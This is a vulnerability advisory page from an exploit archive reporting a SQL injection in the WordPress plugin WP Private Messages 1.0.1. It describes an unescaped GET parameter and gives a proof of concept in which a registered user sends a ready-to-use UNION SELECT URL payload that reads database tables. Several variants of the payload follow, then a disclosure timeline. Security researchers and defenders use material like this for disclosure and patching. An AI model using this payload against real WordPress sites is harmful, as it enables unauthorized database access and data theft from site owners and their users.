WordPress Private Messages 1.0.1 SQL Injection

2016.12.20
Credit: Lenon Leite
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WP Private Messages 1.0.1 a Plugin WordPress a Sql Injection # Exploit Author: Lenon Leite # Vendor Homepage: https://wordpress.org/plugins/wp-private-messages/ # Software Link: https://wordpress.org/plugins/wp-private-messages/ # Contact: http://twitter.com/lenonleite # Website: http://lenonleite.com.br/ # Category: webapps # Version: 1.0.1 # Tested on: Ubuntu 14.04 1 - Description: Type user access: registered user. $_GET[aida] is not escaped. Url is accessible for every registered user. http://lenonleite.com.br/en/blog/2016/12/16/wp-private-messages-1-0-1-plugin-wordpress-sql-injection/ 2 - Proof of Concept: 1 a Login as regular user (created using wp-login.php?action=register): 2 -Using : http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=readid=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved Obs: Use id number of your user in third column after word select. For example: a|UNION+SELECT+1,2,1,name,sluga| a|UNION+SELECT+1,2,2,name,sluga| a|UNION+SELECT+1,2,3,name,sluga| a|UNION+SELECT+1,2,4,name,sluga| a|UNION+SELECT+1,2,5,name,sluga| 3 - Timeline: 12/12/2016 a Discovered 13/12/2016 a Vendor not finded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top